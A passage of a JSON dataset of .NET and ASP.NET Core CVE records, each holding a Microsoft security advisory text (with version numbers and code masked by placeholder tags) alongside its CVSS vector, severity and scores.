both versions NUMBERTAG and NUMBERTAG of the .NET Core runtime. If you've built a self contained application, you must install the new runtime and SDK, recompile your application and redeploy. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the ERRORTAG file for that application. Set the framework version to the desired version and the APITAG property to false. These settings should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Since the ERRORTAG file is an optional file, you may need to create one for each application and add it alongside the executable. Acknowledgments Ben Adams URLTAG of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-0982",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/359",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/359",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2019-05-14T17:00:32Z",
        "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any ASP.NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are also available separately as a APITAG package. If you are not using APITAG directly you may still be affected if you are using APITAG and the package is a transitive dependency. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-1161",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/416",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/416",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2020-05-12T22:57:19Z",
        "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability which exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26423",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/194",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/194",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2021-08-10T21:50:27Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG where .NET APITAG server applications providing APITAG endpoints could be tricked into endlessly looping while trying to read a single APITAG frame. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-0786",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/51",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/51",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2018-01-09T18:01:26Z",
        "description": "Microsoft Security Advisory CVETAG : Security Feature Bypass in NUMBERTAG Certificate Validation. Microsoft Security Advisory CVETAG Security Feature Bypass in NUMBERTAG Certificate Validation Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public versions of .NET Core where an attacker could present a certificate that is marked invalid for a specific use, but a component uses it for that purpose. This action disregards the Enhanced Key Usage tagging. The security update addresses the vulnerability by ensuring that .NET Core components completely validate certificates. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG Developers are advised to update their .NET Core SDK to version NUMBERTAG or NUMBERTAG These runtime and SDK versions will also address CVETAG TODO: ADD LINK TO OTHER ISSUE Discussion Please use TODO: FILL IN ISSUE LINK for discussion of this advisory. Affected Software The vulnerability affects any Microsoft .NET Core project if it uses any of affected runtime versions listed below Runtime Version | Fixed runtime version NUMBERTAG This vulnerability also affects any .NET native applications using the following APITAG packages. APITAG Packages | Fixed APITAG Packages | APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG Advisory FAQ How do I know if I am affected? To check the runtimes installed on a computer you must view the contents of the runtime folder. By default these are | Operating System | Location | | | | | Windows | APITAG PATHTAG | | APITAG | PATHTAG | | Supported Linux platforms | PATHTAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you do not have a directory for NUMBERTAG or NUMBERTAG then any applications targeting .NET Core will be vulnerable. Downloads for all supported platforms can be acquired from URLTAG How do I fix my affected application? Applications can be fixed by installing the latest runtimes or SDKs. Typically application servers only install a runtime package, developer machines install SDKs. Installers can be downloaded from the FILETAG . Runtime version NUMBERTAG will also install runtime version NUMBERTAG If you have built a self contained application URLTAG you must install the new runtime and SDK, recompile your application and redeploy. How do I fix my .NET native application? .NET native requires that applications be re processed by the .NET native compiler to incorporate the fixes and the re processed version needs to be distributed via the Windows Store. We recommend that you update your .NET UWP apps to use the latest minor version of the ERRORTAG APITAG package so that you can build and verify that your app works as expected when updated. If you are using version NUMBERTAG you should update to NUMBERTAG and if you\u2019re using NUMBERTAG you can update to NUMBERTAG Of course, you can update to a higher major version too, but we are distributing security updates for all impacted major versions (currently NUMBERTAG and NUMBERTAG Additionally, whether or not you update your APITAG packages, all applications submitted to the store after today will be automatically fixed during submission processing. If you do not update your app in the Store, it will automatically be reprocessed and distributed via an application update in the next few weeks. Users who have automatic app updates enabled will get the fix with no intervention on your or their parts. Because updated apps are distributed through the Windows Store, sideloaded apps will not be automatically updated. We recommend that developers who distribute sideloaded apps update the affected APITAG packages, rebuild their applications and distribute them to their users. Microsoft is committed to keeping UWP applications secure and to supporting developers. If you have feedback on the fix distribution process, please let us know at EMAILTAG . Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including Terms and Conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue where you can ask questions. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the APITAG URLTAG file for that application and editing the framework version and setting APITAG to false . This should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Note that this file is optional, you may need to create it for each application alongside the executable. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-0545",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/94",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/94",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2019-01-08T18:00:23Z",
        "description": "Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of an information disclosure vulnerability exists in .NET Framework and .NET Core which allows bypassing Cross origin Resource Sharing (CORS) configurations. An attacker who successfully exploited the vulnerability could retrieve content, that is normally restricted, from a web application. The security update addresses the vulnerability by enforcing CORS configuration to prevent its bypass. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. Applications not using APITAG The affected assembly is also available separately as a APITAG package. If you are not using APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11883",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/278",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/278",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2017-11-14T15:25:03Z",
        "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-8269",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/385",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/385",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2019-09-10T17:02:22Z",
        "description": "Microsoft Security Advisory CVETAG : Denial of Service Vulnerability in APITAG Microsoft Security Advisory CVETAG : Denial of Service Vulnerability in APITAG APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service attack in the Microsoft APITAG library used in ASP.NET could cause a denial of service against an APITAG web application. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the APITAG application. The update addresses the vulnerability by updating the version of APITAG ASP.NET Core uses. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application does not use ASP.NET Core's APITAG implementation or your application does not use Azure Storage to store data protect keys you are not affected. APITAG APITAG Affected software Any ASP.NET Core based application that uses APITAG or APITAG with a vulnerable version listed below. Any ASP.NET Core based application that uses the APITAG shared framework with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG | APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I know if I am affected? .NET Core has two types of dependencies: direct and transitive. Direct dependencies are dependencies where you specifically add a package to your project, transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, the APITAG package depends on the APITAG package. When you add a dependency on APITAG in your project, you're taking a transitive dependency on APITAG . Any application that has a direct or transitive dependency on the affected package affected software can be exposed to the vulnerability if it does not meet any of the mitigation factors mitigation factors . APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. The affected assemblies are also available separately as a APITAG package. Even if you are not using APITAG or APITAG directly you may still be affected if either package is a transitive dependency. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends on APITAG , your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version 